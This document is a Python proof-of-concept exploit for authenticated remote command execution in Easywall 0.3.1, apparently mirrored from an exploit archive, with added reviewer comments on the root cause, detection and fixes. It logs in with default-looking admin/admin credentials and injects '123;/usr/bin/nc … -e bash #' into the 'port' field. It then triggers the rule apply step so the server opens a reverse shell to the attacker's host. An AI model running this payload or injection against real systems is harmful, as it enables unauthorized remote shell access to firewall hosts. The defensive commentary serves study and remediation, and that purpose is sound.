## https://sploitus.com/exploit?id=PACKETSTORM:177403
# Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution  
# Date: 30-11-2023  
# Exploit Author: Melvin Mejia  
# Vendor Homepage: https://jpylypiw.github.io/easywall/  
# Software Link: https://github.com/jpylypiw/easywall  
# Version: 0.3.1  
# Tested on: Ubuntu 22.04  
  
import requests, json, urllib3  
# Silences urllib3's warnings. Every request in this script passes verify=False,
# so the server's TLS certificate is never validated.
urllib3.disable_warnings()  
  
def exploit():  
# Proof of concept for the issue named in the file header (Easywall 0.3.1,
# authenticated command execution). It performs three POSTs on one session:
# /login, /ports-save with a crafted "port" value, then /apply-save.
# NOTE(review): indentation was lost in this copy. Everything down to the final
# print belongs to this function, and the lines after each try/except/if/else
# belong to that branch.
# Defender summary: the precondition is a valid web-UI login. The root cause, per
# the author's comment below, is that the "port" form field reaches a shell
# command. The fix on the application side is to accept only an integer in
# 1-65535 (or whatever strict port syntax the app supports) and to build the
# firewall command as an argument list, never as a shell string.
  
# Replace values needed here  
# Lab values from the author's setup (private RFC 1918 addresses).
# NOTE(review): admin/admin looks like a default or test credential - confirm
# against the product docs and make sure no deployment still uses it.
target_host = "192.168.1.25"  
target_port= "12227"  
lhost = "192.168.1.10"  
lport = "9001"  
user = "admin"  
password = "admin"  
  
target = f"https://{target_host}:{target_port}"  
  
# Authenticate to the app  
print("[+] Attempting login with the provided credentials...")  
login_data = {"username":user, "password":password}  
# The session object keeps whatever cookies /login sets, so the later POSTs are
# sent as the logged-in user.
session = requests.session()  
try:  
login = session.post(f'{target}/login',data=login_data,verify=False)  
except Exception as ex:  
print("[!] There was a problem connecting to the app, error:", ex)  
exit(1)  
  
# Any HTTP 200 is treated as a successful login; the response body is not
# inspected. NOTE(review): whether the app answers non-200 on bad credentials is
# not visible here.
if login.status_code != 200:  
print("[!] Login failed.")  
exit(1)  
else:  
print("[+] Login successfull.")   
  
# Send the payload, the port parameter suffers from a command injection vulnerability  
print("[+] Attempting to send payload.")  
# The "port" field starts with a plausible number, then ";" and a second command.
# The trailing "#" presumably comments out whatever the application appends after
# the value - not confirmed from this file.
# Detection: a POST to /ports-save whose "port" value contains anything other than
# digits (";", spaces, "/", "#"), and afterwards the Easywall service spawning
# nc or a shell with an outbound connection.
rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'  
data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"}  
send_payload = session.post(f"{target}/ports-save",data=data,verify=False)  
if send_payload.status_code != 200:  
print("[!] Failed to send payload.")  
exit(1)  
else:  
print("[+] Payload sent.")  
  
# Trigger the execution of the payload  
print("[+] Attempting execution.")  
# Saving the rule only stores the value; according to the author the command runs
# when the rules are applied via /apply-save. Stored rules should therefore be
# re-validated at apply time as well as at save time.
data = {"step_1":"", "step_2":""}  
execute = session.post(f"{target}/apply-save",data=data, verify=False)  
# A 200 here only shows the request was accepted; the script has no way to confirm
# that the command actually ran.
if execute.status_code != 200:  
print("[!] Attempt to execute failed.")  
exit(1)  
else:  
print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.")  
  
# Called unconditionally: there is no __main__ guard, so importing this file also
# sends the requests.
exploit()